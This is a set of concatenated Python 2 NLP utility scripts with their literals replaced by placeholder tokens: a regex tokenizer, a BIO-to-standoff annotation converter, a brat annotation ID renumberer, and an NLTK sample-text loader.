r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT:U+0020>' ) ) <EOL> def _tokenize ( s ) : <EOL> """<STR_LIT>""" <EOL> for r , t in __initial : <EOL> s = r . sub ( t , s ) <EOL> while True : <EOL> o = s <EOL> for r , t in __repeated : <EOL> s = r . sub ( t , s ) <EOL> if o == s : break <EOL> for r , t in __final : <EOL> s = r . sub ( t , s ) <EOL> return s <EOL> def tokenize ( s , ptb_escaping = False , use_single_quotes_only = False , <EOL> escape_token_internal_parens = False ) : <EOL> """<STR_LIT>""" <EOL> if DEBUG_GTB_TOKENIZATION : <EOL> orig = s <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:U+0020>' , s ) <EOL> m = re . match ( r'<STR_LIT>' , s ) <EOL> assert m , "<STR_LIT>" % s <EOL> s , s_end = m . groups ( ) <EOL> s = re . sub ( r'<STR_LIT:$>' , '<STR_LIT:U+0020>' , s ) <EOL> if ptb_escaping : <EOL> if use_single_quotes_only : <EOL> s = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' + "<STR_LIT>" , s ) <EOL> else : <EOL> s = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , s ) <EOL> else : <EOL> s = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , s ) <EOL> s = _tokenize ( s ) <EOL> if ptb_escaping : <EOL> if use_single_quotes_only : <EOL> s = s . replace ( '<STR_LIT:">' , "<STR_LIT>" ) <EOL> else : <EOL> s = s . replace ( '<STR_LIT:">' , "<STR_LIT>" ) <EOL> else : <EOL> s = s . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> if not ptb_escaping : <EOL> if not escape_token_internal_parens : <EOL> s = PTB_unescape ( s ) <EOL> else : <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:(>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:)>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:[>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:]>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:{>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:}>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:U+0020>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , s ) <EOL> if DEBUG_GTB_TOKENIZATION : <EOL> r1 = PTB_unescape ( orig . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( "<STR_LIT:'>" , '<STR_LIT>' ) . replace ( '<STR_LIT:">' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> r2 = PTB_unescape ( s . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( "<STR_LIT:'>" , '<STR_LIT>' ) . replace ( '<STR_LIT:">' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if r1 != r2 : <EOL> print >> sys . stderr , "<STR_LIT>" % ( orig , s ) <EOL> s = orig <EOL> return s + s_end <EOL> def __argparser ( ) : <EOL> import argparse <EOL> ap = argparse . ArgumentParser ( description = "<STR_LIT>" ) <EOL> ap . add_argument ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> ap . add_argument ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> ap . add_argument ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> ap . add_argument ( "<STR_LIT>" , metavar = "<STR_LIT>" , nargs = "<STR_LIT:*>" , help = "<STR_LIT>" ) <EOL> return ap <EOL> def main ( argv ) : <EOL> import sys <EOL> import codecs <EOL> arg = __argparser ( ) . parse_args ( argv [ <NUM_LIT:1> : ] ) <EOL> ptb_escaping , use_single_quotes_only , escape_token_internal_parens = False , False , False <EOL> if arg . ptb : <EOL> ptb_escaping = True <EOL> if arg . mccc : <EOL> ptb_escaping = True <EOL> use_single_quotes_only = True <EOL> if arg . sp : <EOL> escape_token_internal_parens = True <EOL> if len ( arg . files ) == <NUM_LIT:0> : <EOL> arg . files . append ( '<STR_LIT>' ) <EOL> for fn in arg . files : <EOL> try : <EOL> with codecs . open ( fn , encoding = INPUT_ENCODING ) as f : <EOL> for l in f : <EOL> t = tokenize ( l , ptb_escaping = ptb_escaping , <EOL> use_single_quotes_only = use_single_quotes_only , <EOL> escape_token_internal_parens = escape_token_internal_parens ) <EOL> sys . stdout . write ( t . encode ( OUTPUT_ENCODING ) ) <EOL> except Exception , e : <EOL> print >> sys . stderr , "<STR_LIT>" , fn , "<STR_LIT::>" , e <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import sys <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> from __future__ import with_statement <EOL> import sys <EOL> import re <EOL> import os <EOL> import codecs <EOL> class taggedEntity : <EOL> def __init__ ( self , startOff , endOff , eType , idNum , fullText ) : <EOL> self . startOff = startOff <EOL> self . endOff = endOff <EOL> self . eType = eType <EOL> self . idNum = idNum <EOL> self . fullText = fullText <EOL> self . eText = fullText [ startOff : endOff ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . idNum , self . eType , self . startOff , <EOL> self . endOff , self . eText ) <EOL> def check ( self ) : <EOL> assert "<STR_LIT:\n>" not in self . eText , "<STR_LIT>" % self . eText <EOL> assert self . eText == self . eText . strip ( ) , "<STR_LIT>" % self . eText <EOL> def BIO_to_standoff ( BIOtext , reftext , tokenidx = <NUM_LIT:2> , tagidx = - <NUM_LIT:1> ) : <EOL> BIOlines = BIOtext . split ( '<STR_LIT:\n>' ) <EOL> return BIO_lines_to_standoff ( BIOlines , reftext , tokenidx , tagidx ) <EOL> next_free_id_idx = <NUM_LIT:1> <EOL> def BIO_lines_to_standoff ( BIOlines , reftext , tokenidx = <NUM_LIT:2> , tagidx = - <NUM_LIT:1> ) : <EOL> global next_free_id_idx <EOL> taggedTokens = [ ] <EOL> ri , bi = <NUM_LIT:0> , <NUM_LIT:0> <EOL> while ( ri < len ( reftext ) ) : <EOL> if bi >= len ( BIOlines ) : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> break <EOL> BIOline = BIOlines [ bi ] <EOL> if re . match ( r'<STR_LIT>' , BIOline ) : <EOL> bi += <NUM_LIT:1> <EOL> else : <EOL> fields = BIOline . split ( '<STR_LIT:\t>' ) <EOL> try : <EOL> tokentext = fields [ tokenidx ] <EOL> except : <EOL> print >> sys . stderr , "<STR_LIT>" "<STR_LIT>" % ( tokenidx , BIOline ) <EOL> raise <EOL> try : <EOL> tag = fields [ tagidx ] <EOL> except : <EOL> print >> sys . stderr , "<STR_LIT>" "<STR_LIT>" % ( tagidx , BIOline ) <EOL> raise <EOL> m = re . match ( r'<STR_LIT>' , tag ) <EOL> assert m , "<STR_LIT>" % tag <EOL> ttag , ttype = m . groups ( ) <EOL> if len ( ttype ) > <NUM_LIT:0> and ttype [ <NUM_LIT:0> ] == "<STR_LIT:->" : <EOL> ttype = ttype [ <NUM_LIT:1> : ] <EOL> assert ( ( ttype == "<STR_LIT>" and ttag == "<STR_LIT:O>" ) or <EOL> ( ttype != "<STR_LIT>" and ttag in ( "<STR_LIT:B>" , "<STR_LIT:I>" ) ) ) , "<STR_LIT>" % tag <EOL> while ri < len ( reftext ) and reftext [ ri ] . isspace ( ) : <EOL> ri += <NUM_LIT:1> <EOL> assert reftext [ ri : ri + len ( tokentext ) ] == tokentext , "<STR_LIT>" % ( reftext [ ri : ri + len ( tokentext ) ] . encode ( "<STR_LIT>" ) , <EOL> tokentext . encode ( "<STR_LIT>" ) ) <EOL> taggedTokens . append ( ( ri , ri + len ( tokentext ) , ttag , ttype ) ) <EOL> ri += len ( tokentext ) <EOL> bi += <NUM_LIT:1> <EOL> while ri < len ( reftext ) and reftext [ ri ] . isspace ( ) : <EOL> ri += <NUM_LIT:1> <EOL> if ( len ( [ c for c in reftext [ ri : ] if not c . isspace ( ) ] ) != <NUM_LIT:0> or <EOL> len ( [ c for c in BIOlines [ bi : ] if not re . match ( r'<STR_LIT>' , c ) ] ) != <NUM_LIT:0> ) : <EOL> assert False , "<STR_LIT>" "<STR_LIT>" % ( reftext [ ri : ] , BIOlines [ bi : ] ) <EOL> standoff_entities = [ ] <EOL> revisedTagged = [ ] <EOL> prevTag = None <EOL> for startoff , endoff , ttag , ttype in taggedTokens : <EOL> if prevTag == "<STR_LIT:O>" and ttag == "<STR_LIT:I>" : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> ttag = "<STR_LIT:B>" <EOL> revisedTagged . append ( ( startoff , endoff , ttag , ttype ) ) <EOL> prevTag = ttag <EOL> taggedTokens = revisedTagged <EOL> revisedTagged = [ ] <EOL> prevTag , prevType = None , None <EOL> for startoff , endoff , ttag , ttype in taggedTokens : <EOL> if prevTag in ( "<STR_LIT:B>" , "<STR_LIT:I>" ) and ttag == "<STR_LIT:I>" and prevType != ttype : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> ttag = "<STR_LIT:B>" <EOL> revisedTagged . append ( ( startoff , endoff , ttag , ttype ) ) <EOL> prevTag , prevType = ttag , ttype <EOL> taggedTokens = revisedTagged <EOL> prevTag , prevEnd = "<STR_LIT:O>" , <NUM_LIT:0> <EOL> currType , currStart = None , None <EOL> for startoff , endoff , ttag , ttype in taggedTokens : <EOL> if prevTag != "<STR_LIT:O>" and ttag != "<STR_LIT:I>" : <EOL> assert currType is not None and currStart is not None , "<STR_LIT>" % fn <EOL> standoff_entities . append ( taggedEntity ( currStart , prevEnd , currType , <EOL> next_free_id_idx , reftext ) ) <EOL> next_free_id_idx += <NUM_LIT:1> <EOL> currType , currStart = None , None <EOL> elif prevTag != "<STR_LIT:O>" : <EOL> assert ttag == "<STR_LIT:I>" , "<STR_LIT>" % fn <EOL> assert currType == ttype , "<STR_LIT>" "<STR_LIT>" % ( currType , ttype ) <EOL> if ttag == "<STR_LIT:B>" : <EOL> currType , currStart = ttype , startoff <EOL> prevTag , prevEnd = ttag , endoff <EOL> if prevTag != "<STR_LIT:O>" : <EOL> standoff_entities . append ( taggedEntity ( currStart , prevEnd , currType , <EOL> next_free_id_idx , reftext ) ) <EOL> next_free_id_idx += <NUM_LIT:1> <EOL> for e in standoff_entities : <EOL> e . check ( ) <EOL> return standoff_entities <EOL> RANGE_RE = re . compile ( r'<STR_LIT>' ) <EOL> def parse_indices ( idxstr ) : <EOL> indices = [ ] <EOL> for i in idxstr . split ( '<STR_LIT:U+002C>' ) : <EOL> if not RANGE_RE . match ( i ) : <EOL> indices . append ( int ( i ) ) <EOL> else : <EOL> start , end = RANGE_RE . match ( i ) . groups ( ) <EOL> for j in range ( int ( start ) , int ( end ) ) : <EOL> indices . append ( j ) <EOL> return indices <EOL> def main ( argv ) : <EOL> if len ( argv ) < <NUM_LIT:3> or len ( argv ) > <NUM_LIT:5> : <EOL> print >> sys . stderr , "<STR_LIT>" , argv [ <NUM_LIT:0> ] , "<STR_LIT>" <EOL> return <NUM_LIT:1> <EOL> textfn , biofn = argv [ <NUM_LIT:1> ] , argv [ <NUM_LIT:2> ] <EOL> tokenIdx = None <EOL> if len ( argv ) >= <NUM_LIT:4> : <EOL> tokenIdx = int ( argv [ <NUM_LIT:3> ] ) <EOL> bioIdx = None <EOL> if len ( argv ) >= <NUM_LIT:5> : <EOL> bioIdx = argv [ <NUM_LIT:4> ] <EOL> with open ( textfn , '<STR_LIT>' ) as textf : <EOL> text = textf . read ( ) <EOL> with open ( biofn , '<STR_LIT>' ) as biof : <EOL> bio = biof . read ( ) <EOL> if tokenIdx is None : <EOL> so = BIO_to_standoff ( bio , text ) <EOL> elif bioIdx is None : <EOL> so = BIO_to_standoff ( bio , text , tokenIdx ) <EOL> else : <EOL> try : <EOL> indices = parse_indices ( bioIdx ) <EOL> except : <EOL> print >> sys . stderr , '<STR_LIT>' % bioIdx <EOL> return <NUM_LIT:1> <EOL> so = [ ] <EOL> for i in indices : <EOL> so . extend ( BIO_to_standoff ( bio , text , tokenIdx , i ) ) <EOL> for s in so : <EOL> print s <EOL> return <NUM_LIT:0> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> from __future__ import with_statement <EOL> import sys <EOL> import re <EOL> DEBUG = True <EOL> class Annotation ( object ) : <EOL> def __init__ ( self , id_ , type_ ) : <EOL> self . id_ = id_ <EOL> self . type_ = type_ <EOL> def map_ids ( self , idmap ) : <EOL> self . id_ = idmap [ self . id_ ] <EOL> class Textbound ( Annotation ) : <EOL> def __init__ ( self , id_ , type_ , offsets , text ) : <EOL> Annotation . __init__ ( self , id_ , type_ ) <EOL> self . offsets = offsets <EOL> self . text = text <EOL> def map_ids ( self , idmap ) : <EOL> Annotation . map_ids ( self , idmap ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , <EOL> '<STR_LIT:U+0020>' . join ( self . offsets ) , self . text ) <EOL> class ArgAnnotation ( Annotation ) : <EOL> def __init__ ( self , id_ , type_ , args ) : <EOL> Annotation . __init__ ( self , id_ , type_ ) <EOL> self . args = args <EOL> def map_ids ( self , idmap ) : <EOL> Annotation . map_ids ( self , idmap ) <EOL> mapped = [ ] <EOL> for arg in self . args : <EOL> key , value = arg . split ( '<STR_LIT::>' ) <EOL> value = idmap [ value ] <EOL> mapped . append ( "<STR_LIT>" % ( key , value ) ) <EOL> self . args = mapped <EOL> class Relation ( ArgAnnotation ) : <EOL> def __init__ ( self , id_ , type_ , args ) : <EOL> ArgAnnotation . __init__ ( self , id_ , type_ , args ) <EOL> def map_ids ( self , idmap ) : <EOL> ArgAnnotation . map_ids ( self , idmap ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , '<STR_LIT:U+0020>' . join ( self . args ) ) <EOL> class Event ( ArgAnnotation ) : <EOL> def __init__ ( self , id_ , type_ , trigger , args ) : <EOL> ArgAnnotation . __init__ ( self , id_ , type_ , args ) <EOL> self . trigger = trigger <EOL> def map_ids ( self , idmap ) : <EOL> ArgAnnotation . map_ids ( self , idmap ) <EOL> self . trigger = idmap [ self . trigger ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , self . trigger , <EOL> '<STR_LIT:U+0020>' . join ( self . args ) ) <EOL> class Attribute ( Annotation ) : <EOL> def __init__ ( self , id_ , type_ , target , value ) : <EOL> Annotation . __init__ ( self , id_ , type_ ) <EOL> self . target = target <EOL> self . value = value <EOL> def map_ids ( self , idmap ) : <EOL> Annotation . map_ids ( self , idmap ) <EOL> self . target = idmap [ self . target ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , self . target , <EOL> '<STR_LIT>' if self . value is None else '<STR_LIT:U+0020>' + self . value ) <EOL> class Normalization ( Annotation ) : <EOL> def __init__ ( self , id_ , type_ , target , ref , reftext ) : <EOL> Annotation . __init__ ( self , id_ , type_ ) <EOL> self . target = target <EOL> self . ref = ref <EOL> self . reftext = reftext <EOL> def map_ids ( self , idmap ) : <EOL> Annotation . map_ids ( self , idmap ) <EOL> self . target = idmap [ self . target ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , self . target , <EOL> self . ref , self . reftext ) <EOL> class Equiv ( Annotation ) : <EOL> def __init__ ( self , id_ , type_ , targets ) : <EOL> Annotation . __init__ ( self , id_ , type_ ) <EOL> self . targets = targets <EOL> def map_ids ( self , idmap ) : <EOL> Annotation . map_ids ( self , idmap ) <EOL> self . targets = [ idmap [ target ] for target in self . targets ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , '<STR_LIT:U+0020>' . join ( self . targets ) ) <EOL> class Note ( Annotation ) : <EOL> def __init__ ( self , id_ , type_ , target , text ) : <EOL> Annotation . __init__ ( self , id_ , type_ ) <EOL> self . target = target <EOL> self . text = text <EOL> def map_ids ( self , idmap ) : <EOL> Annotation . map_ids ( self , idmap ) <EOL> self . target = idmap [ self . target ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , self . target , self . text ) <EOL> def parse_textbound ( fields ) : <EOL> id_ , type_offsets , text = fields <EOL> type_offsets = type_offsets . split ( '<STR_LIT:U+0020>' ) <EOL> type_ , offsets = type_offsets [ <NUM_LIT:0> ] , type_offsets [ <NUM_LIT:1> : ] <EOL> return Textbound ( id_ , type_ , offsets , text ) <EOL> def parse_relation ( fields ) : <EOL> id_ , type_args = fields <EOL> type_args = type_args . split ( '<STR_LIT:U+0020>' ) <EOL> type_ , args = type_args [ <NUM_LIT:0> ] , type_args [ <NUM_LIT:1> : ] <EOL> return Relation ( id_ , type_ , args ) <EOL> def parse_event ( fields ) : <EOL> id_ , type_trigger_args = fields <EOL> type_trigger_args = type_trigger_args . split ( '<STR_LIT:U+0020>' ) <EOL> type_trigger , args = type_trigger_args [ <NUM_LIT:0> ] , type_trigger_args [ <NUM_LIT:1> : ] <EOL> type_ , trigger = type_trigger . split ( '<STR_LIT::>' ) <EOL> args = [ a for a in args if a ] <EOL> return Event ( id_ , type_ , trigger , args ) <EOL> def parse_attribute ( fields ) : <EOL> id_ , type_target_value = fields <EOL> type_target_value = type_target_value . split ( '<STR_LIT:U+0020>' ) <EOL> if len ( type_target_value ) == <NUM_LIT:3> : <EOL> type_ , target , value = type_target_value <EOL> else : <EOL> type_ , target = type_target_value <EOL> value = None <EOL> return Attribute ( id_ , type_ , target , value ) <EOL> def parse_normalization ( fields ) : <EOL> id_ , type_target_ref , reftext = fields <EOL> type_ , target , ref = type_target_ref . split ( '<STR_LIT:U+0020>' ) <EOL> return Normalization ( id_ , type_ , target , ref , reftext ) <EOL> def parse_note ( fields ) : <EOL> id_ , type_target , text = fields <EOL> type_ , target = type_target . split ( '<STR_LIT:U+0020>' ) <EOL> return Note ( id_ , type_ , target , text ) <EOL> def parse_equiv ( fields ) : <EOL> id_ , type_targets = fields <EOL> type_targets = type_targets . split ( '<STR_LIT:U+0020>' ) <EOL> type_ , targets = type_targets [ <NUM_LIT:0> ] , type_targets [ <NUM_LIT:1> : ] <EOL> return Equiv ( id_ , type_ , targets ) <EOL> parse_func = { <EOL> '<STR_LIT:T>' : parse_textbound , <EOL> '<STR_LIT:R>' : parse_relation , <EOL> '<STR_LIT:E>' : parse_event , <EOL> '<STR_LIT:N>' : parse_normalization , <EOL> '<STR_LIT:M>' : parse_attribute , <EOL> '<STR_LIT:A>' : parse_attribute , <EOL> '<STR_LIT:#>' : parse_note , <EOL> '<STR_LIT:*>' : parse_equiv , <EOL> } <EOL> def parse ( l , ln ) : <EOL> assert len ( l ) and l [ <NUM_LIT:0> ] in parse_func , "<STR_LIT>" % ( ln , l ) <EOL> try : <EOL> return parse_func [ l [ <NUM_LIT:0> ] ] ( l . split ( '<STR_LIT:\t>' ) ) <EOL> except Exception : <EOL> assert False , "<STR_LIT>" % ( ln , l ) <EOL> def process ( fn ) : <EOL> idmap = { } <EOL> with open ( fn , "<STR_LIT>" ) as f : <EOL> lines = [ l . rstrip ( '<STR_LIT:\n>' ) for l in f . readlines ( ) ] <EOL> annotations = [ ] <EOL> for i , l in enumerate ( lines ) : <EOL> annotations . append ( parse ( l , i + <NUM_LIT:1> ) ) <EOL> if DEBUG : <EOL> for i , a in enumerate ( annotations ) : <EOL> assert lines [ i ] == str ( a ) , ( "<STR_LIT>" + <EOL> '<STR_LIT>' % lines [ i ] + "<STR_LIT>" + <EOL> '<STR_LIT>' % str ( a ) ) <EOL> idmap = { } <EOL> next_free = { } <EOL> idmap [ '<STR_LIT:*>' ] = '<STR_LIT:*>' <EOL> for i , a in enumerate ( annotations ) : <EOL> if a . id_ == '<STR_LIT:*>' : <EOL> continue <EOL> assert a . id_ not in idmap , "<STR_LIT>" % ( i , l ) <EOL> prefix = a . id_ [ <NUM_LIT:0> ] <EOL> seq = next_free . get ( prefix , <NUM_LIT:1> ) <EOL> idmap [ a . id_ ] = prefix + str ( seq ) <EOL> next_free [ prefix ] = seq + <NUM_LIT:1> <EOL> for i , a in enumerate ( annotations ) : <EOL> a . map_ids ( idmap ) <EOL> print ( a ) <EOL> def main ( argv ) : <EOL> if len ( argv ) < <NUM_LIT:2> : <EOL> print >> sys . stderr , "<STR_LIT>" , argv [ <NUM_LIT:0> ] , "<STR_LIT>" <EOL> return <NUM_LIT:1> <EOL> for fn in argv [ <NUM_LIT:1> : ] : <EOL> process ( fn ) <EOL> return <NUM_LIT:0> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> from __future__ import print_function <EOL> from nltk . corpus import ( gutenberg , genesis , inaugural , <EOL> nps_chat , webtext , treebank , wordnet ) <EOL> from nltk . text import Text <EOL> from nltk . probability import FreqDist <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> text1 = Text ( gutenberg . words ( '<STR_LIT>' ) ) <EOL> print ( "<STR_LIT>" , text1 . name ) <EOL> text2 = Text ( gutenberg . words ( '<STR_LIT>' ) ) <EOL> print ( "<STR_LIT>" , text2 . name ) <EOL> text3 = Text ( genesis . words ( '<STR_LIT>' ) , name = "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , text3 . name ) <EOL> text4 = Text ( inaugural . words ( ) , name = "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , text4 . name ) <EOL> text5 = Text ( nps_chat . words ( ) , name = "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , text5 . name ) <EOL> text6 = Text ( webtext . words ( '<STR_LIT>' ) , <EOL> name = "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , text6 . name ) <EOL> text7 = Text ( treebank . words ( ) , name = "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , text7 . name ) <EOL> text8 = Text ( webtext . words ( '<STR_LIT>' ) , name = "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , text8 . name ) <EOL> text9 = Text ( gutenberg . words ( '<STR_LIT>' ) ) <EOL> print ( "<STR_LIT>" , text9 . name ) <EOL> def texts ( ) : <EOL> print ( "<STR_LIT>" , text1 . name ) <EOL> print ( "<STR_LIT>" , text2 . name ) <EOL> print ( "<STR_LIT>" , text3 . name ) <EOL> print ( "<STR_LIT>" , text4 . name ) <EOL> print ( "<STR_LIT>" , text5 . name ) <EOL> print ( "<STR_LIT>" , text6 . name ) <EOL> print ( "<STR_LIT>" , text7 . name ) <EOL> print ( "<STR_LIT>" , text8 . name ) <EOL> print ( "<STR_LIT>" , text9 . name ) <EOL> sent1 = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:.>" ] <EOL> sent2 = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:.>" ] <EOL> sent3 = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:.>" ] <EOL> sent4 = [ "<STR_LIT>" , "<STR_LIT:->" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT::>" ] <EOL> sent5 = [ "<STR_LIT:I>" , "<STR_LIT>" , "<STR_LIT:a>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:to>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> sent6 = [ '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT::>' , '<STR_LIT:[>' , '<STR_LIT>' , '<STR_LIT:]>' , '<STR_LIT:[>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:]>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT::>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:!>' ] <EOL> sent7 = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:U+002C>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:U+002C>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:a>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:.>" ] <EOL> sent8 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:U+002C>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:U+002C>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:.>' ] <EOL> sent9 = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:U+002C>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:a>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:.>" ] <EOL> def sents ( ) : <EOL> print ( "<STR_LIT>" , "<STR_LIT:U+0020>" . join ( sent1 ) ) <EOL> print ( "<STR_LIT>" , "<STR_LIT:U+0020>" . join ( sent2 ) ) <EOL> print ( "<STR_LIT>" , "<STR_LIT:U+0020>" . join ( sent3 ) ) <EOL> print ( "<STR_LIT>" , "<STR_LIT:U+0020>" . join ( sent4 ) ) <EOL> print ( "<STR_LIT>" , "<STR_LIT:U+0020>" . join ( sent5 ) ) <EOL> print ( "<STR_LIT>" , "<STR_LIT:U+0020>" . join ( sent6 ) ) <EOL> print ( "<STR_LIT>" , "<STR_LIT:U+0020>" . join ( sent7 ) ) <EOL> print ( "<STR_LIT>" , "<STR_LIT:U+0020>" . join ( sent8 ) ) <EOL> print ( "<STR_LIT>" , "<STR_LIT:U+0020>" . join ( sent9 ) ) </s>
